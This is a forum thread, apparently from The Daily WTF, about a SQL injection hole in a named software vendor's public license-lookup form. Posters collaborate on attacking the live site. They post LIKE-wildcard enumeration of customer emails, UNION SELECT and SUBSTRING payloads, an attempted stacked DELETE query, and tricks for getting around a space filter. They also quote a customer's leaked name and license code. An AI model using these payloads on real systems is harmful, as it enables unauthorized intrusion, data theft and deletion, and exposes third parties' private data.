Easily hacked...


  • Winner of the 2016 Presidential Election

    http://fixtunes.com/purchasecode.php

    You can enter your email address on this form to retrieve the license you purchased. I thought, at first, it was a little insecure because you don't need any information besides an email address.

    As it turns out, you don't even need that. The text gets used in a SQL query using the LIKE operator, so a percent sign will work just as well!



  • That's horrible.  I also don't like the idea that someone can pull up my product key just by knowing my email address.



  • I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 


  • Winner of the 2016 Presidential Election

    Presumably you could extract email addresses from this.

    Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.



  • @joe.edwards@imaginuity.com said:

    Presumably you could extract email addresses from this.

    Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.

     

    plz send codez



  • @skippy said:

    I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 

     

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.


  • Winner of the 2016 Presidential Election

    @medialint said:

    @skippy said:

    I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 

     

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.

    I suppose the wildcards are there so you can work around the character length restriction.



  • Bad query:

  • Error #: 1064
  • Error: You have an error in your
    SQL syntax. Check the manual that corresponds to your MySQL server
    version for the right syntax to use near ';deletefromd_purchases#'
    limit 0,1' at line 1
  • Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1
  •  

     

     They do seem to remove all spaces from your input.... Anyone know how to get around that?


  • Winner of the 2016 Presidential Election

    @MasterPlanSoftware said:

    Bad query:

  • Error #: 1064
  • Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
  • Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1

     

  •  

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    Use a different kind of whitespace? Like a tab character.

    That said... Please don't delete their data. Somehow I doubt they're following proper backup procedures.



  • @joe.edwards@imaginuity.com said:

    Use a different kind of whitespace? Like a tab character.
     

    Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.



  • @MasterPlanSoftware said:

    @joe.edwards@imaginuity.com said:

    Use a different kind of whitespace? Like a tab character.
     

    Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.

     

    The tab character works, but it'll only run a single query. 


  • Winner of the 2016 Presidential Election


    abc' union select Email from d_Purchases where Email like 'a%



  • Interesting...

    Purchase Code: afes-sler-@c



  • Good to know that Mr. Fessler's code is AAA5-4E26-K9


  • Winner of the 2016 Presidential Election

    So I guess you can extract data in chunks with substring commands, knowing they're going to format any string like a license key.



  • @joe.edwards@imaginuity.com said:


    abc' union select Email from d_Purchases where Email like 'a%

     

    And then:

    abc'    union    select     SUBSTRING(Email    FROM    9)     from     d_Purchases     where     Email     like     'a%


  • Discourse touched me in a no-no place

    @MasterPlanSoftware said:

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    1. %20?
    2. Don't bother?
    3. Alt-0160?

    In a random order. I suggest #2.



  • @PJH said:

    @MasterPlanSoftware said:

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    1. %20?
    2. Don't bother?
    3. Alt-0160?

    In a random order. I suggest #2.

     

    Yeah, already solved. Thanks for your helpfulness...



  • @medialint said:

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
     

     

    I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database.  Some people's e-mail address is way too long.



  • @Heron said:

    @medialint said:

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
     

     

    I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database.  Some people's e-mail address is way too long.

    Is there any actual limit on email address lengths?



  • The part before the @ should be no longer than 64 characters while the domain name can be up to 255 characters, then add the @ and you have a maxiumum of 320 characters. However, the 64 character local-part limit isn't enforced and you can go longer.



  • So something like " OR 1=1 ORDER BY RAND(); -- would get you a random license? :D

    There's a similar hole on the LimeWire Pro site as well... :)



  • They appear to have fixed it. I now get "Error" when I put in %. 



  • @Jonathan Holland said:

    They appear to have fixed it. I now get "Error" when I put in %.
     

    Hurray for your efforts! 



  • It's not really fixed. If you enter anything other than an email address then it shows the nice helpful "error." screen.


Log in to reply
 

Looks like your connection to What the Daily WTF? was lost, please wait while we try to reconnect.